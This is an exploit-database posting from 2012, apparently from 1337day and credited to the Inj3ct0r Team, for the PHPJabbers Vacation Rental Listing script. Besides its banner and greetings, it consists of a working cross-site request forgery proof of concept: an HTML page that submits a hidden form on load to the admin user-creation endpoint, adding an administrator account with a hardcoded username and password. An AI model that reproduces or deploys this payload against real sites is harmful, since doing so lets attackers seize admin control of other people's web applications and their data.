Home / exploits Vacation Rental Listing Cross Site Request Forgery
Posted on 05 April 2012
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 +---------------------------------------+ 1 0 |I'm DoSs-Dz member from Inj3ct0r Team | 1 1 +---------------------------------------+ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 +----------------------------------------------------------------------------+ # Exploit Title : Vacation rental listing Csrf add admin # Date : 04 April 2012 # Site for Vendor : TicketSupportScript.com # Live Demo : http://www.phpjabbers.com/demo/vrl_20/index.php # Big Thank to : Inj3ct0r Team & Inj3ct0r Operators "CrosS" +----------------------------------------------------------------------------+ [!1»] Exploit P0C =» <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title> Csrf By : DoSs-Dz </title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> var pauses = new Array( "514","306","496" ); function pausecomp(millis){ var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < millis);} function fireForms(){ var count = 3; var i=0; for(i=0; i<count; i++) {document.forms[i].submit(); pausecomp(pauses[i]); }} </script> <H2> Csrf By : DoSs-Dz </H2> <form method="POST" name="form0" action="http://www.phpjabbers.com:80/demo/vrl_20/index.php?controller=AdminUsers&action=create"> <input type="hidden" name="user_create" value="1"/> <input type="hidden" name="role_id" value="1"/> <input type="hidden" name="username" value="Black-ID"/> <--------UserName <input type="hidden" name="password" value="Black-ID"/> <------Password <input type="hidden" name="name" value="Black-ID"/> <input type="hidden" name="email" value="Black-ID@Black-ID.com"/> <input type="hidden" name="status" value="T"/> </form> </body> </html> +--------------------------------------------------------------------------------------------------------+ |[»] Greetz to =» [ Robert Miles ] , [ Black-ID ] , [ Abdou Abdo ] , [ Hacker_Dz] , [ Damane2011 ] | |[»] Greetz to =» [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ] | +--------------------------------------------------------------------------------------------------------+ +------------------------------------+ |./ Gharrdaia on : 04 april 2012 | +------------------------------------+
